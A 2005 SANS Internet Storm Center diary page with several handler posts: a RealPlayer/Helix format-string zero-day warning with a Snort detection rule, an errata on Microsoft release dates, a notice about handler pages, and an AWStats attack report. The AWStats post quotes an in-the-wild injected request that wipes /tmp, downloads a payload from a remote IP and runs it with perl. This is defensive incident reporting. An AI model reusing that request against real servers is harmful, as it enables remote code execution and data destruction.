Threat Level: green Handler on Duty: Jim Clausing

SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2005-09-27 InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Possible New Zero-Day Exploit for Realplayer

Published: 2005-09-27
Last Updated: 2005-09-27 18:16:19 UTC
by Lorna Hutcheson (Version: 2)
0 comment(s)
FrSIRT is reporting a zero day exploit against client side Realplayer and Helix Player.  This exploit takes advantage of a format string error which can be exploit by using specially crafted ".rp" (relpix) or ".rt" (realtext) files.  The affected versions are

Helix Player 1.0.5 Gold and prior (Linux)
RealPlayer 10.0.5 Gold and prior (Linux)


There is no known fix at this time. 
http://service.real.com/help/faq/security/ has not posted information on this yet. 

Blake Hartstein from demarc.com posted the following to Bleeding-Snort yesterday which should provide
coverage for this issue:

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any 
(msg:"BLEEDING-EDGE RealPlayer/Helix Player Format String Exploit";
flow:established,from_server; content:"
pcre:"/
]*handle=[^>]*%[^>]*%/iRG";
reference:url,milw0rm.com/id.php?id=1232; reference:bugtraq,14945;
sid:2002381; rev:1;)
Stay tuned for further updates as we have them.  .

Keywords:
0 comment(s)

Errata, Mea Culpa, "latest" "Date released" and "Date Published"

Published: 2005-09-27
Last Updated: 2005-09-27 18:14:23 UTC
by Patrick Nolan (Version: 1)
0 comment(s)
The Handlers Diary of September 24th 2005 concerning IE 6 SP1 and Direct X downloads Published: 2005-09-24, Last Updated: 2005-09-24 22:37:53 UTC by Adrien de Beaupre (Version: 1) was a result of my reporting what MS describes as the "latest" "Published" security updates to Adrien. After he was kind enough to post what I thought was new MS security information, I remembered that I had once before made the mistake of interpreting Microsoft information as indicating new when in fact they were not just "Published" or not just "released". Unfortunately I didn't jump through to the digital signatures to determine the actual date's issued. So Adrien, I apologize for sending in un-vetted information that caused you and some readers problems. And I thank the Diary readers who took the time to determine the actual date's issued and point out the errors to me.

"Release date" and "Date Published" and "latest" as used by MS on their "Download Center" and as a result of going through their "Microsoft Download Notifications" email service are useless in determining currency. Take the additional steps and check the digital signature dates and research some more and you'll know if they're needed in your environment.

Reader clue Submission;

We had some posts pointing out that these were not "new" items, one submission (they requested anonymity) said it best;

"1. the ie6sp1 for non-xp sp2 systems that you say it is new..the file date&time it may well be, but the digital signature date for the file that i downloaded from that link says it was signed on May 3rd 2004 !!! so its an old one.

Maybe the file date was modified on the download server, but the  says otherwise.

2. same with the dx8 file.. this one is even older

the digital signature says it was created on August 8th 2003, even older!

please check the digital signatures in the future before posting announcements."


Thank you "anonymous", next time I'll be sure to remember that.

Exculpatory information

The Microsoft's Download Center's "Release Date" for the Diary items said;

"Internet Explorer 6 Service Pack 1 Release date 9/21/2005" and "Security Fix for DirectX 8 (KB819696) Release date 9/22/2005".

When you click the download link for the details of each Download Center item, the download "Date Published" information says;

"Internet Explorer 6 Service Pack 1 Date Published:  9/22/2005" and goes on to say:
"Quick Description:
Internet Explorer 6 is the set of core Web browsing technologies in Windows XP. These core technologies have recently been updated as part of Windows XP Service Pack 2 (SP2) with Advanced Security Technologies". And I assumed (I know ....) that MS had updated IE running on XPSP1 with IEXPSP2 security technology.... No other clueful information there.

Moving on, the "Security Fix for DirectX 8 on Windows 2000, Windows ME, Windows 98 SE, and Windows 98 (KB819696)" says "Date Published:  9/22/2005". Again, there's no other clueful information there.

On "Latest" and Published"

In addition,  when you receive the "Microsoft Download Notifications" email service (in this case September 23, 2005") and click it's links for the "latest" you get the same date items as above. The "Notifications" email is "a free weekly mailing that provides you with the latest drivers, trial software, service packs, and other downloads from the Microsoft Download Center. Listed below are downloads published in the Download Center in the past week, in the categories that you have chosen*".

In summary "Date released", "Date Published" and "latest" have nothing to do with currency.

I did contact MS about this but I'm having problems understanding where to go from here. Encyclopedia? Susan Bradley, ( ; ^ ) Susan!

Other;

"Release date" use;
"Earnings Release Date Set"
http://moneycentral.msn.com/investor/alerts/glossary.asp?TermID=2

"Date Published"
http://www.cgpublisher.com/CGOntology/CGDatePublished

Patrick Nolan ( ; ^ )
Keywords:
0 comment(s)

New Handler Pages Are Here!

Published: 2005-09-27
Last Updated: 2005-09-27 04:17:46 UTC
by Lorna Hutcheson (Version: 1)
0 comment(s)
If you ever wondered what the handlers were all about and who we were as "real" folks, then this is something that you might enjoy.  We have a new section coming up where the handlers will each have their own web page.  Here you can find more information on the handlers themselves and on security issues and topics they feel are important.  The first handler to have theirs completed is Pedro Bueno.  So if you have time, check out the first site and meet Pedro!  He is starting a great section on malware analysis.  Go grab yourself a cup of coffee and enjoy!
Keywords:
0 comment(s)

AWSTATS

Published: 2005-09-27
Last Updated: 2005-09-27 04:07:39 UTC
by Lorna Hutcheson (Version: 1)
0 comment(s)
AWSTATS has been a very frequent flyer as an email subject to us since the first vulnerability dealing with remote command execution was released this past January.  I went back through my old emails and since then we have gotten 77 emails all dealing with seeing this exploit in the wild, some successful, some not successful.  It has gotten more difficult to distinguish what is old and what is new.  Its all starting to blend together like all the SDbot variants running around out there (got one of those in the mail today too).  We received more reports today of the following activity taking place so keep your eyes open.

GET //awstats.pl?configdir=|echo
%20;cd%20/tmp;rm%20-rf%20*;wget%20http://218.188.9.19/.it/abc;perl%20abc;echo%20;rm%20-rf%20abc*;echo| HTTP/1.1

Also, see the diary by fellow handler Erik Fichtner dated August 29, 2005 for more on this.



Keywords:
0 comment(s)
Diary Archives